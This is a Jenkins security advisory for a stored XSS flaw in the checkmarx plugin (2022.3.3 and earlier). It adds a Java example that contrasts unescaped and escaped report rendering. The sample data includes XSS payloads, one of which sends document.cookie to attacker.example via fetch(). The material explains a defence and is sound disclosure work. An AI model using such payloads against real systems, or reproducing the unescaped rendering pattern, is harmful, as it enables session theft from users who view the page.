[JENKINS:SECURITY-2869] Stored XSS vulnerability in `checkmarx`
Severity: High
Affected Packages: 2
Fixed Packages: 2
CVEs: 1
The checkmarx plugin processes Checkmarx service API responses and generates HTML reports from them for rendering on the Jenkins UI.

checkmarx 2022.3.3 and earlier does not escape values returned from the Checkmarx service API before inserting them into HTML reports. Because the generated report is persisted with the build and rendered to any user who views it, this results in a stored cross-site scripting (XSS) vulnerability.

NOTE: While Jenkins users without Overall/Administer permission are not allowed to configure the URL to the Checkmarx service, the responses from that service can still be tampered with by an attacker positioned between Jenkins and the service (man-in-the-middle), so the permission requirement does not remove the exposure.

checkmarx 2022.4.3 escapes values returned from the Checkmarx service API before inserting them into HTML reports.
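The following is an added illustration of the bug class and of the fix the advisory describes; it is not code from the Checkmarx plugin. The ScanResult record, the renderUnsafe/renderSafe names, the hand-written escapeHtml helper and the sample response values are all constructed for this example. The first renderer concatenates API values straight into the report, as 2022.3.3 and earlier did; the second escapes each value at the point it enters the HTML, as 2022.4.3 does.

```java
import java.util.List;

/**
 * Added illustration of the stored XSS pattern and its fix. Not code from the
 * Checkmarx plugin: the record, method names and sample values are constructed.
 */
public class CheckmarxReportExample {

    /** Stand-in for one entry decoded from a Checkmarx service API response. */
    record ScanResult(String projectName, String severity, String description) {}

    /** Pattern of 2022.3.3 and earlier: API values concatenated straight into the report HTML. */
    static String renderUnsafe(List<ScanResult> results) {
        StringBuilder html = new StringBuilder("<table>\n");
        for (ScanResult r : results) {
            html.append("<tr><td>").append(r.projectName())
                .append("</td><td>").append(r.severity())
                .append("</td><td>").append(r.description())
                .append("</td></tr>\n");
        }
        return html.append("</table>").toString();
    }

    /**
     * Minimal HTML escaper for text nodes and quoted attribute values.
     * Assumption: a real Jenkins plugin would call a library escaper (for example
     * hudson.Util.escape); it is written out here so the example compiles with no dependencies.
     */
    static String escapeHtml(String s) {
        if (s == null) {
            return "";
        }
        StringBuilder out = new StringBuilder(s.length());
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&' -> out.append("&amp;");
                case '<' -> out.append("&lt;");
                case '>' -> out.append("&gt;");
                case '"' -> out.append("&quot;");
                case '\'' -> out.append("&#39;");
                default -> out.append(c);
            }
        }
        return out.toString();
    }

    /** Pattern of 2022.4.3: every value from the API is escaped where it enters the HTML. */
    static String renderSafe(List<ScanResult> results) {
        StringBuilder html = new StringBuilder("<table>\n");
        for (ScanResult r : results) {
            html.append("<tr><td>").append(escapeHtml(r.projectName()))
                .append("</td><td>").append(escapeHtml(r.severity()))
                .append("</td><td>").append(escapeHtml(r.description()))
                .append("</td></tr>\n");
        }
        return html.append("</table>").toString();
    }

    public static void main(String[] args) {
        // Constructed sample response: one ordinary finding and one whose fields were
        // altered in transit, the man-in-the-middle case the advisory points out.
        List<ScanResult> fromApi = List.of(
            new ScanResult("payments-api", "High", "SQL injection in /login"),
            new ScanResult("<img src=x onerror=alert(document.domain)>", "Low",
                           "\"><script>fetch('https://attacker.example/?c='+document.cookie)</script>"));

        // The unsafe report contains live markup; the safe report shows the same bytes as text.
        System.out.println("--- unsafe report ---\n" + renderUnsafe(fromApi));
        System.out.println("--- safe report ---\n" + renderSafe(fromApi));
    }
}
```

Compile and run with `javac CheckmarxReportExample.java && java CheckmarxReportExample` (Java 17 or later, for records and arrow-form switch). The point to take from the output is that the attacker's payload never needs to pass through Jenkins' own input validation: it arrives as data from a service the plugin trusts, is written into the report once, and then executes in the Jenkins origin for every user who later opens that build page. Restricting who may configure the service URL does not help against a tampered response, which is why the fix is output escaping in the renderer rather than a tighter permission check.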
Package | Affected Version |
---|---|
pkg:maven/org.jenkins-ci.plugins/checkmarx | <= 2022.3.3 |
pkg:github/jenkinsci/checkmarx-plugin | <= 2022.3.3 |
Package | Fixed Version |
---|---|
pkg:maven/org.jenkins-ci.plugins/checkmarx | = 2022.4.3 |
pkg:github/jenkinsci/checkmarx-plugin | = 2022.4.3 |
- ID: JENKINS:SECURITY-2869
- Severity: high
- Published: 2022-12-07T00:00:00
- Modified: 2022-12-07T00:00:00
- Rights: Jenkins Security Team
- Other Advisories

Source | ID | Name | URL |
---|---|---|---|
Plugin repository | | checkmarx repository | https://github.com/jenkinsci/checkmarx-plugin |
Type | Package URL | Namespace | Name / Product | Version | Distribution / Platform | Arch | Patch / Fix |
---|---|---|---|---|---|---|---|
Affected | pkg:maven/org.jenkins-ci.plugins/checkmarx | org.jenkins-ci.plugins | checkmarx | <= 2022.3.3 | |||
Fixed | pkg:maven/org.jenkins-ci.plugins/checkmarx | org.jenkins-ci.plugins | checkmarx | = 2022.4.3 | |||
Affected | pkg:github/jenkinsci/checkmarx-plugin | jenkinsci | checkmarx-plugin | <= 2022.3.3 | |||
Fixed | pkg:github/jenkinsci/checkmarx-plugin | jenkinsci | checkmarx-plugin | = 2022.4.3 | |||